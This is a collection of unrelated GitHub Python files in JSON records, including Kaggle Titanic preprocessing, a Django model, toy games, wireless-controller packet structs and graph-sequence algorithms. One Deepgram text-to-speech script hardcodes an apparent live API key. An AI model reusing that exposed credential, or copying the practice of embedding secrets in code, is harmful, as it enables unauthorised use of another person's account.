use_mmi:\n mmi_target_folder_name = download_reverse_model_folder(config)\n mmi_model, mmi_tokenizer = load_model(mmi_target_folder_name, config)\n else:\n mmi_model = None\n mmi_tokenizer = None\n\n # Run Telegram bot\n bot = TelegramBot(model, tokenizer, config, mmi_model=mmi_model, mmi_tokenizer=mmi_tokenizer)\n bot.run_chat()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ubaer/Personalised_context_aware_DialoGPT","sub_path":"gpt2bot/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":7111,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38151305686","text":"import json\n\n# compare percentages of poptype, demographic group with median values from box and whisker\nwith open('az/finalboxwhisker/a_cvap.json') as f:\n avg = json.load(f)\nwith open('az/postprocessed/postprocessed.json') as f:\n p = json.load(f)\n\ndistrictpops = []\n# sort districts from lowest to highest population\n# sum of squares of demographic pop from median in box and whisker\nfor districting in p:\n for district in p[districting]['districts']:\n print(district)\n key = 'district' + district\n districtpops.append(p[districting][key]\n [\"asian_cvap\"]/p[districting][key][\"tot_cvap\"])\n break\n break\n # districtpops.append(p[districting][district])\n","repo_name":"matthewjchun/Gerrymanderer","sub_path":"seawulf/mggg_postprocessing/avg_districtings.py","file_name":"avg_districtings.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31958877201","text":"__author__ = 'ylwoi'\n\nclass Sharpie:\n def __init__(self, color, width, ink_amount):\n self.color = color\n self.width = width\n self.ink_amount = ink_amount\n SharpieSet.set.append([self.color, self.ink_amount])\n def use(self):\n self.ink_amount -= 40\n for i in SharpieSet.set:\n if self.color == i[0]:\n i[1] -= 40\n\nclass SharpieSet:\n set = []\n def count_usable(self):\n count = 0\n for i in SharpieSet.set:\n if i[1] > 0:\n 
count += 1\n return count\n\n def remove_trash(self):\n list2 = []\n for i in SharpieSet.set:\n if i[1] > 0:\n list2.append(i)\n SharpieSet.set = list2\n\nss = SharpieSet()\n\nsharp1 = Sharpie('blue', 120.5, 90)\nsharp2 = Sharpie('yellow', 99.5, 40)\nsharp3 = Sharpie('black', 200, 0)\nsharp4 = Sharpie('white', 150, 80)\nsharp5 = Sharpie('green', 75.5, 0)\n\nprint(SharpieSet.set)\nprint(ss.count_usable())\n\nsharp1.use()\nsharp2.use()\n\nprint(ss.count_usable())\n\nprint(SharpieSet.set)\n\nss.remove_trash()\nprint(SharpieSet.set)","repo_name":"jsdelivrbot/Ylwoi","sub_path":"week04/day_1/sharpie_set.py","file_name":"sharpie_set.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15704412385","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\n\n\n# In[ ]:\n\n\ndataset = pd.read_csv(\"../input/train.csv\") \n\n\n# In[ ]:\n\n\ndataset.head()\n\n\n# In[ ]:\n\n\ndataset[['class1','class2']] = pd.get_dummies(dataset['Pclass'],drop_first=True)\n\n\n# In[ ]:\n\n\ndataset.head()\n\n\n# In[ ]:\n\n\nimport seaborn as sns\ndataset.notnull()\nsns.heatmap(dataset.notnull())\n\n\n# In[ ]:\n\n\n\ndef impute_age(cols):\n Age = cols[0]\n Pclass = cols[1]\n if pd.isnull(Age):\n if Pclass == 1:\n return 37\n elif Pclass == 2:\n return 29\n else:\n return 24\n else:\n return Age\n\n\n# In[ ]:\n\n\ndataset['Age'] = dataset[['Age','Pclass']].apply(impute_age,axis = 1)\n\n\n# In[ ]:\n\n\nsns.heatmap(dataset.isnull())\n\n\n# In[ ]:\n\n\ndataset.drop('Cabin',inplace = True,axis = 1)\n\n\n# In[ ]:\n\n\ndataset['Sex'] = pd.get_dummies(dataset['Sex'],drop_first=True) \n\n\n# In[ ]:\n\n\ndataset.head()\n\n\n# In[ ]:\n\n\nembark = pd.get_dummies(dataset['Embarked'],drop_first = True)\n\n\n# In[ ]:\n\n\n\ndataset.head()\n\n\n# In[ ]:\n\n\ndataset.dropna(inplace = True)\n\n\n# In[ ]:\n\n\nsns.heatmap(dataset.isnull())\n\n\n# In[ ]:\n\n\ndataset = pd.concat([dataset,embark],axis = 1)\n\n\n# In[ ]:\n\n\ndataset.head()\n\n\n# In[ ]:\n\n\ndataset.drop(['PassengerId','Name','Ticket','Embarked'],axis = 1,inplace = True)\n\n\n# In[ ]:\n\n\ndataset.head()\n\n\n# In[ ]:\n\n\nx = dataset.drop('Survived',axis = 1)\nx = x.drop('Pclass',axis = 1)\ny = dataset['Survived']\n\n\n# In[ ]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n# In[ ]:\n\n\nrfc = RandomForestClassifier(n_estimators = 300,criterion = 'entropy')\n\n\n# In[ ]:\n\n\nx.dropna(inplace = True)\n\n\n# In[ ]:\n\n\ny.dropna(inplace = True)\n\n\n# In[ ]:\n\n\nrfc.fit(x,y)\n\n\n# In[ ]:\n\n\ntest = pd.read_csv(\"../input/test.csv\")\n\n\n# In[ ]:\n\n\ntest.head()\n\n\n# In[ ]:\n\n\nembark = pd.get_dummies(test['Embarked'],drop_first=True)\n\n\n# In[ ]:\n\n\nsex = pd.get_dummies(test['Sex'],drop_first=True)\n\n\n# In[ ]:\n\n\ntest.drop(['PassengerId','Name','Sex','Ticket','Cabin','Embarked'],inplace = True,axis = 
1)\n\n\n# In[ ]:\n\n\nnew_test = pd.concat([test,sex,embark],axis = 1)\n\n\n# In[ ]:\n\n\nnew_test.head()\n\n\n# In[ ]:\n\n\nnew_test['Age'] = new_test[['Age','Pclass']].apply(impute_age,axis = 1)\n\n\n# In[ ]:\n\n\nsns.heatmap(new_test.isnull())\n\n\n# In[ ]:\n\n\nnew_test['Sex'] = new_test['male']\n\n\n# In[ ]:\n\n\nnew_test.drop('male',axis = 1,inplace = True)\n\n\n# In[ ]:\n\n\nnew_test.head()\n\n\n# In[ ]:\n\n\nx.head()\n\n\n# In[ ]:\n\n\nnew_test[['class1','class2']] = pd.get_dummies(new_test['Pclass'],drop_first = True)\n\n\n# In[ ]:\n\n\nnew_test.head()\n\n\n# In[ ]:\n\n\nnew_test = new_test.drop('Pclass',axis = 1)\n\n\n# In[ ]:\n\n\nsns.heatmap(new_test.notna())\n\n\n# In[ ]:\n\n\nx.head()\n\n\n# In[ ]:\n\n\ntest_set = new_test[['Sex','Age','SibSp','Parch','Fare','class1','class2','Q','S']]\n\n\n# In[ ]:\n\n\nsns.heatmap(test_set.isna())\n\n\n# In[ ]:\n\n\nnp.where(test_set.isna())\n\n\n# In[ ]:\n\n\nnew_test = test_set.fillna(test_set['Fare'].mean())\n\n\n# In[ ]:\n\n\ny_pred = rfc.predict(new_test)\n\n\n# In[ ]:\n\n\ny_pred\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"nischalshrestha/automatic_wat_discovery","sub_path":"Notebooks/py/satheeshrsm/classification-of-passenger/classification-of-passenger.py","file_name":"classification-of-passenger.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"19908002819","text":"from django.db import models as django_models\nfrom budgets.domain import value_objects\nfrom budgets.infrastructure.models import mixins\nfrom django.contrib.auth import get_user_model\n\nUser = get_user_model()\n\n\nclass BudgetBalanceChange(mixins.CreateAndUpdateMixin, django_models.Model):\n amount = django_models.DecimalField(max_digits=8, decimal_places=2)\n budget = django_models.ForeignKey(\n \"budgets.Budget\",\n on_delete=django_models.CASCADE,\n related_name=\"balance_changes\",\n )\n description = django_models.CharField(max_length=256)\n type = django_models.CharField(\n max_length=16, choices=value_objects.BudgetBalanceChangeType.choices()\n )\n category = django_models.CharField(\n max_length=16, choices=value_objects.BudgetBalanceChangeCategory.choices()\n )\n owner = django_models.ForeignKey(\n User, on_delete=django_models.CASCADE, related_name=\"balance_changes\"\n )\n","repo_name":"urbrob/family-budget","sub_path":"budgets/infrastructure/models/budget_balance_change.py","file_name":"budget_balance_change.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39865938524","text":"\"\"\"\nEnvironment Variable handling\n\"\"\"\nimport os\nimport sys\n\nclass Env():\n \"\"\"\n Environment Variable class\n \"\"\"\n def __init__(self):\n # Initialize Variables\n self.env_var:dict = {\n # [key] : [value]\n # key = The environment variable keyword\n # value = the value\n \"DATABASE_PATH\" : \"\",\n \"DATABASE_NAME\" : \"\"\n }\n\n def list_all_Env(self):\n \"\"\"\n List all environment variable keys and values\n \"\"\"\n for k,v in self.env_var.items():\n print(\"{} = {}\".format(k,v))\n\n def get_Value(self, keyword):\n \"\"\"\n Get value of keyword in environment variable dictionary\n \"\"\"\n return self.env_var[keyword]\n\n def source(self):\n \"\"\"\n Source Environment Variables\n \"\"\"\n # Initialize Variables\n env_var = self.env_var\n\n # Loop through all keywords and source\n for k,_ in env_var.items():\n # Get environment variable of keyword\n v = 
os.environ.get(k)\n\n # Map environment variable keyword to value\n env_var[k] = v\n\n # Replace global variable\n self.env_var = env_var\n\n def source_from_File(self, cfg_file=\"config.txt\"):\n \"\"\"\n Source environment variable from file\n \"\"\"\n # Initialize Variables\n env_var = self.env_var\n\n # Open Configuration File for reading\n with open(cfg_file, \"r\") as read_config:\n # Read file contents\n\n ## Read first line\n line = read_config.readline()\n\n while line != \"\":\n # Still have line\n\n # Split the line into delimiters\n spl_v = line.split()\n\n # Get indexes\n keyword = spl_v[0]\n delimiter = spl_v[1]\n value = spl_v[2]\n\n # Map environment variable keyword to value\n env_var[keyword] = value\n\n # Read next line\n line = read_config.readline()\n\n # Close file after usage\n read_config.close()\n\n # Replace global variable\n self.env_var = env_var\n\n\n","repo_name":"Thanatisia/dev-references","sub_path":"languages/python/libraries/sqlite3/projects/db_create/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"17038875653","text":"import asyncio\nfrom deepgram import Deepgram\nfrom docx import Document\nimport json\n\nDEEPGRAM_API_KEY = 'e9312877e73293d229ed0e89fffc093ca7e420dd'\nTEXT_TO_SPEAK = 'Seu texto aqui'\n\ndocument = Document('saida.docx')\ntext_to_speak = ' '.join([paragraph.text for paragraph in document.paragraphs])\n\nasync def main():\n deepgram = Deepgram(DEEPGRAM_API_KEY)\n\n response = await asyncio.create_task(\n deepgram.text_to_speech(text_to_speak, language='pt')\n )\n\n with open('output_audio.wav', 'wb') as audio_file:\n audio_file.write(response)\n\n print('Texto do arquivo \"saida.docx\" convertido em áudio e salvo em output_audio.wav')\n\ntry:\n asyncio.run(main())\nexcept Exception as e:\n print(f'Erro: {e}')","repo_name":"ASanderO/Leitura-de-PDF","sub_path":"text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35189448906","text":"import random as r\n\ndef PlayAgain():\n pin = input(\"Would you like to play again? \\n y/n>>>\")\n if pin == \"y\" or pin == \"Y\":\n RockPaperScissors()\n elif pin == \"n\" or pin == \"N\":\n print(\"returning to main menu...\")\n else:\n print(\"Invalid Response\")\n PlayAgain()\n \ndef RockPaperScissors():\n urmom = r.randint(1,3) \n if urmom == 1:\n urmom = \"rock\"\n elif urmom == 2:\n urmom = \"paper\"\n elif urmom == 3:\n urmom = \"scissors\"\n\n playerinput = int(input(\"Please enter an item:\\n 1.Rock \\n 2.Paper \\n 3.Scissors \\n>>>\"))\n if playerinput == 1:\n playerinput = 'rock'\n elif playerinput == 2:\n playerinput = 'paper'\n elif playerinput == 3:\n playerinput = 'scissors'\n else: \n print(\"Invalid input.\")\n RockPaperScissors()\n \n if playerinput == urmom:\n print(\"You done be committed to a tie...\")\n PlayAgain()\n elif playerinput == \"rock\" and urmom == \"paper\":\n print(f'Player Choice: {playerinput}! \\nComputer choice: {urmom}!')\n print(\"Computer Wins.\")\n PlayAgain()\n elif playerinput == \"paper\" and urmom == \"rock\":\n print(f'Player Choice: {playerinput}! \\nComputer choice: {urmom}!')\n print(\"Player Wins.\")\n PlayAgain()\n elif playerinput == \"scissors\" and urmom == \"rock\":\n print(f'Player Choice: {playerinput}! 
\\nComputer choice: {urmom}!')\n print(\"Computer Wins.\")\n PlayAgain()\n elif playerinput == \"rock\" and urmom == \"scissors\":\n print(f'Player Choice: {playerinput}! \\nComputer choice: {urmom}!')\n print(\"Player Wins.\")\n PlayAgain()\n elif playerinput == \"paper\" and urmom == \"scissors\":\n print(f'Player Choice: {playerinput}! \\nComputer choice: {urmom}!')\n print(\"Computer Wins.\")\n PlayAgain()\n elif playerinput == \"scissors\" and urmom == \"paper\":\n print(f'Player Choice: {playerinput}! \\nComputer choice: {urmom}!')\n print(\"Player Wins.\")\n PlayAgain()\n\n \n \n \n","repo_name":"ZaneZimmermanCCTI/GroupProject","sub_path":"rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"35358189848","text":"\"\"\"\nConsider a list (list = []). You can perform the following commands:\ninsert i e: Insert integer at position .\nprint: Print the list.\nremove e: Delete the first occurrence of integer .\nappend e: Insert integer at the end of the list.\nsort: Sort the list.\npop: Pop the last element from the list.\nreverse: Reverse the list.\n\n\"\"\"\n\n# ls = []\n# n = int(input())\n\n# for i in range(n):\n# command,*args = input().split()\n# match(command):\n# case \"insert\":\n# ls.insert(int(args[0]),int(args[1]))\n# case \"print\":\n# print(ls)\n# case \"remove\":\n# ls.remove(int(args[0]))\n# case \"append\":\n# ls.append(int(args[0]))\n# case \"sort\":\n# ls.sort()\n# case \"pop\":\n# ls.pop()\n# case \"reverse\":\n# ls.reverse()\n \n \n \nif __name__ == '__main__':\n ls = []\n N = int(input())\n for i in range(N):\n command,*args = input().split()\n if command == \"insert\":\n ls.insert(int(args[0]),int(args[1]))\n if command == \"print\":\n print(ls)\n if command == \"remove\":\n ls.remove(int(args[0]))\n if command == \"append\":\n ls.append(int(args[0]))\n if command == \"sort\":\n ls.sort()\n if command == \"pop\":\n ls.pop()\n if command == \"reverse\":\n ls.reverse()","repo_name":"ArslanAli4747/python_hacker_rank","sub_path":"lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40975749261","text":"from construct import Sequence\nfrom construct import Array\nfrom construct import Struct\nfrom construct import UBInt8\nfrom construct import UBInt16\nfrom construct import UBInt32\nfrom construct import Bytes\nfrom construct import Range\nfrom construct import BitStruct\nfrom construct import Bit\nfrom construct import Padding\n\n\nPT_VERSION = 0x00\n\nPT_BYE = 0x00\nPT_REGISTER = 0x01\nPT_LVAP_JOIN = 0x02\nPT_LVAP_LEAVE = 0x03\nPT_HELLO = 0x04\nPT_PROBE_REQUEST = 0x05\nPT_PROBE_RESPONSE = 0x06\nPT_AUTH_REQUEST = 0x07\nPT_AUTH_RESPONSE = 0x08\nPT_ASSOC_REQUEST = 0x09\nPT_ASSOC_RESPONSE = 0x10\nPT_ADD_LVAP = 0x11\nPT_DEL_LVAP = 0x12\nPT_STATUS_LVAP = 0x13\nPT_SET_PORT = 0x14\nPT_STATUS_PORT = 0x15\nPT_CAPS = 0x16\nPT_ADD_VAP = 0x31\nPT_DEL_VAP = 0x32\nPT_STATUS_VAP = 0x33\n\nHEADER = Struct(\"header\", UBInt8(\"version\"), UBInt8(\"type\"), UBInt16(\"length\"))\n\nSSIDS = Range(1, 10, Struct(\"ssids\", UBInt8(\"length\"),\n Bytes(\"ssid\", lambda ctx: ctx.length)))\n\nHELLO = Struct(\"hello\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"wtp\", 6),\n UBInt32(\"period\"),\n UBInt32(\"uplink_bytes\"),\n 
UBInt32(\"downlink_bytes\"))\n\nPROBE_REQUEST = Struct(\"probe_request\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"wtp\", 6),\n Bytes(\"sta\", 6),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n Bytes(\"ssid\", lambda ctx: ctx.length - 28))\n\nPROBE_RESPONSE = Struct(\"probe_response\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"sta\", 6))\n\nAUTH_REQUEST = Struct(\"auth_request\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"wtp\", 6),\n Bytes(\"sta\", 6),\n Bytes(\"bssid\", 6))\n\nAUTH_RESPONSE = Struct(\"auth_response\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"sta\", 6),\n Bytes(\"bssid\", 6))\n\nASSOC_REQUEST = \\\n Struct(\"assoc_request\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"wtp\", 6),\n Bytes(\"sta\", 6),\n Bytes(\"bssid\", 6),\n Bytes(\"ssid\", lambda ctx: ctx.length - 26))\n\nASSOC_RESPONSE = Struct(\"assoc_response\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"sta\", 6))\n\nADD_LVAP = Struct(\"add_lvap\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n BitStruct(\"flags\", Padding(13),\n Bit(\"set_mask\"),\n Bit(\"associated\"),\n Bit(\"authenticated\")),\n UBInt16(\"assoc_id\"),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n Bytes(\"sta\", 6),\n Bytes(\"encap\", 6),\n Bytes(\"net_bssid\", 6),\n Bytes(\"lvap_bssid\", 6),\n SSIDS)\n\nDEL_LVAP = Struct(\"del_lvap\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"sta\", 6))\n\nSTATUS_LVAP = Struct(\"status_lvap\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n BitStruct(\"flags\", Padding(13),\n Bit(\"set_mask\"),\n Bit(\"associated\"),\n Bit(\"authenticated\")),\n UBInt16(\"assoc_id\"),\n Bytes(\"wtp\", 6),\n Bytes(\"sta\", 6),\n Bytes(\"encap\", 6),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n Bytes(\"net_bssid\", 6),\n Bytes(\"lvap_bssid\", 6),\n SSIDS)\n\nCAPS_R = Sequence(\"blocks\",\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n BitStruct(\"flags\", Padding(16)))\n\nCAPS_P = Sequence(\"ports\", Bytes(\"hwaddr\", 6),\n UBInt16(\"port_id\"),\n Bytes(\"iface\", 10))\n\nCAPS = Struct(\"caps\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"wtp\", 6),\n UBInt8(\"nb_resources_elements\"),\n UBInt8(\"nb_ports_elements\"),\n Array(lambda ctx: ctx.nb_resources_elements, CAPS_R),\n Array(lambda ctx: ctx.nb_ports_elements, CAPS_P))\n\nSET_PORT = Struct(\"set_port\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n BitStruct(\"flags\", Padding(15),\n Bit(\"no_ack\")),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n Bytes(\"sta\", 6),\n UBInt16(\"rts_cts\"),\n UBInt8(\"tx_mcast\"),\n UBInt8(\"ur_mcast_count\"),\n UBInt8(\"nb_mcses\"),\n Array(lambda ctx: ctx.nb_mcses, UBInt8(\"mcs\")))\n\nSTATUS_PORT = Struct(\"status_port\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n BitStruct(\"flags\", Padding(15),\n Bit(\"no_ack\")),\n Bytes(\"wtp\", 6),\n Bytes(\"sta\", 6),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n UBInt16(\"rts_cts\"),\n 
UBInt8(\"tx_mcast\"),\n UBInt8(\"ur_mcast_count\"),\n UBInt8(\"nb_mcses\"),\n Array(lambda ctx: ctx.nb_mcses, UBInt8(\"mcs\")))\n\nADD_VAP = Struct(\"add_vap\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n Bytes(\"net_bssid\", 6),\n Bytes(\"ssid\", lambda ctx: ctx.length - 22))\n\nSTATUS_VAP = Struct(\"status_vap\", UBInt8(\"version\"),\n UBInt8(\"type\"),\n UBInt16(\"length\"),\n UBInt32(\"seq\"),\n Bytes(\"wtp\", 6),\n Bytes(\"hwaddr\", 6),\n UBInt8(\"channel\"),\n UBInt8(\"band\"),\n Bytes(\"net_bssid\", 6),\n Bytes(\"ssid\", lambda ctx: ctx.length - 28))\n\nPT_TYPES = {PT_BYE: None,\n PT_REGISTER: None,\n PT_LVAP_JOIN: None,\n PT_LVAP_LEAVE: None,\n PT_HELLO: HELLO,\n PT_PROBE_REQUEST: PROBE_REQUEST,\n PT_PROBE_RESPONSE: PROBE_RESPONSE,\n PT_AUTH_REQUEST: AUTH_REQUEST,\n PT_AUTH_RESPONSE: AUTH_RESPONSE,\n PT_ASSOC_REQUEST: ASSOC_REQUEST,\n PT_ASSOC_RESPONSE: ASSOC_RESPONSE,\n PT_ADD_LVAP: ADD_LVAP,\n PT_DEL_LVAP: DEL_LVAP,\n PT_STATUS_LVAP: STATUS_LVAP,\n PT_CAPS: CAPS,\n PT_SET_PORT: SET_PORT,\n PT_STATUS_PORT: STATUS_PORT,\n PT_STATUS_VAP: STATUS_VAP}\n\nPT_TYPES_HANDLERS = {PT_BYE: [],\n PT_REGISTER: [],\n PT_LVAP_JOIN: [],\n PT_LVAP_LEAVE: [],\n PT_HELLO: [],\n PT_PROBE_REQUEST: [],\n PT_PROBE_RESPONSE: [],\n PT_AUTH_REQUEST: [],\n PT_AUTH_RESPONSE: [],\n PT_ASSOC_REQUEST: [],\n PT_ASSOC_RESPONSE: [],\n PT_ADD_LVAP: [],\n PT_DEL_LVAP: [],\n PT_STATUS_LVAP: [],\n PT_CAPS: [],\n PT_SET_PORT: [],\n PT_STATUS_PORT: [],\n PT_STATUS_VAP: []}\n","repo_name":"herlesupreeth/Empcontroller","sub_path":"empower/lvapp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24612468375","text":"import random\nfrom graphs import Vertex\nfrom graphs import Edge\nfrom graphs import Graph\nfrom drawGraph import drawVertexes\n\n\ndef canGraphBeCreatedFrom(sequence):\n \"\"\"\n Sprawdza czy mozna stworzyc graf z podanej listy stopni wierzcholkow\n na podstawie algorytmu Havel'a-Hakimi'ego\n \"\"\"\n if sum(sequence) % 2 == 1:\n return False\n\n while True:\n sequence = sorted(sequence, reverse=True)\n\n if sequence[0] == 0 and sequence[len(sequence) - 1] == 0:\n return True\n\n v = sequence[0]\n sequence = sequence[1:]\n\n if v > len(sequence):\n return False\n\n for i in range(v):\n sequence[i] -= 1\n\n if sequence[i] < 0:\n return False\n\n\ndef createGraphFromSequence(sequence):\n \"\"\"\n Tworzy graf z podanej listy stopni wierzcholkow\n jesli to niemozliwe zwraca None\n \"\"\"\n if not canGraphBeCreatedFrom(sequence):\n return None\n\n graph = Graph(False)\n\n vertexesAndSequenceCombined = []\n GET_VERTEX = 0\n GET_SEQUENCE = 1\n for i in range(len(sequence)):\n vertexesAndSequenceCombined.append([graph.addVertex(), sequence[i]])\n\n while True:\n vertexesAndSequenceCombined = sorted(vertexesAndSequenceCombined, reverse=True, key=lambda a: a[GET_SEQUENCE])\n\n if vertexesAndSequenceCombined[0][GET_SEQUENCE] == 0 and \\\n vertexesAndSequenceCombined[len(vertexesAndSequenceCombined) - 1][GET_SEQUENCE] == 0:\n return graph\n\n maximum = vertexesAndSequenceCombined[0][GET_SEQUENCE]\n\n for endVertex in range(1, 1 + maximum):\n graph.addEdge(vertexesAndSequenceCombined[0][GET_VERTEX],\n vertexesAndSequenceCombined[endVertex][GET_VERTEX])\n vertexesAndSequenceCombined[endVertex][GET_SEQUENCE] -= 1\n\n vertexesAndSequenceCombined = 
vertexesAndSequenceCombined[1:]\n\n\ndef canEdgesBeSwapped(graph: Graph, edge1: Edge, edge2: Edge):\n \"\"\"\n Sprawdza czy mozna zamienic pare krawedzi (ab, cd) na pare (ad, bc) bez zmieniania stopni wierzcholkow grafu\n \"\"\"\n if edge1.equals(edge2):\n return False\n\n aVertex = edge1.startVertex\n bVertex = edge1.endVertex\n\n cVertex = edge2.startVertex\n dVertex = edge2.endVertex\n\n if aVertex.equals(dVertex) or bVertex.equals(cVertex) \\\n or graph.findEdges(aVertex, dVertex) != None or graph.findEdges(dVertex, aVertex) != None \\\n or graph.findEdges(bVertex, cVertex) != None or graph.findEdges(cVertex, bVertex) != None:\n return False\n\n return True\n\n\ndef randomizeNotDirectedGraphWithoutChangingDegrees(graph: Graph, count: int = 10):\n \"\"\"\n Gdy to mozliwe, zamienia losowe krawedzie w grafie bez zmieniania stopni wierzcholkow i zwraca nowy graf\n \"\"\"\n newGraph = graph.copy()\n loopCount = 0\n MAX_LOOP = 1000\n for i in range(count):\n if loopCount > MAX_LOOP:\n return newGraph\n\n while True:\n if loopCount > MAX_LOOP:\n return newGraph\n loopCount += 1\n\n edgeLabel1, edge1 = random.choice(list(newGraph.edgeIndex.items()))\n edgeLabel2, edge2 = random.choice(list(newGraph.edgeIndex.items()))\n\n if canEdgesBeSwapped(graph, edge1, edge2):\n break\n\n aVertex = edge1.startVertex\n bVertex = edge1.endVertex\n\n cVertex = edge2.startVertex\n dVertex = edge2.endVertex\n\n edge1.removeMe()\n edge2.removeMe()\n\n newGraph.addEdge(aVertex, dVertex, edgeLabel1)\n newGraph.addEdge(bVertex, cVertex, edgeLabel2)\n\n return newGraph\n\n\ndef createK_RegularGraph(k: int, size: int = -1):\n if size == -1:\n size = random.randint(3, 8) * 2\n sequence = [k for i in range(size)]\n if not canGraphBeCreatedFrom(sequence):\n return None\n\n graph = createGraphFromSequence(sequence)\n return randomizeNotDirectedGraphWithoutChangingDegrees(graph)\n\n\n#######\n#\n# Tests\n#\n#######\n\ndef testSequence():\n print('\\nStarting testing creating from sequence\\n')\n\n sequence = [7, 7, 5, 4, 4, 4, 3, 3, 2, 1]\n assert canGraphBeCreatedFrom(sequence) == True\n graph = createGraphFromSequence(sequence)\n assert graph != None\n print('First graph:\\n', graph, '\\n')\n\n sum = 0\n for i in range(100):\n secondGraph = randomizeNotDirectedGraphWithoutChangingDegrees(graph)\n thirdGraph = randomizeNotDirectedGraphWithoutChangingDegrees(secondGraph)\n sum += 0 if graph.equals(secondGraph) else 1\n sum += 0 if secondGraph.equals(thirdGraph) else 1\n assert sum >= 198\n\n print('Second graph:\\n', secondGraph, '\\n')\n\n sequence = [8, 4, 6, 5, 2, 1, 2, 3, 4, 4, 2, 1]\n\n assert canGraphBeCreatedFrom(sequence) == True\n graph = createGraphFromSequence(sequence)\n assert graph != None\n\n sequence = [10, 2, 3, 6, 3, 7, 9]\n assert canGraphBeCreatedFrom(sequence) == False\n graph = createGraphFromSequence(sequence)\n assert graph == None\n\n print('\\nFinished\\n')\n\n\ndef testK_Regular():\n print('\\nStarting testing k regular graphs\\n')\n graph = createK_RegularGraph(3, 6)\n secondGraph = createK_RegularGraph(3, 6)\n print('First graph:\\n', graph, '\\n')\n print('Second graph:\\n', secondGraph, '\\n')\n print('\\nFinished\\n')\n\n\nif __name__ == \"__main__\":\n testSequence()\n testK_Regular()\n","repo_name":"pawel2000pl/GrafyLab","sub_path":"set2_tasks-1-2-5.py","file_name":"set2_tasks-1-2-5.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23818044252","text":"import unittest\nfrom ..parser 
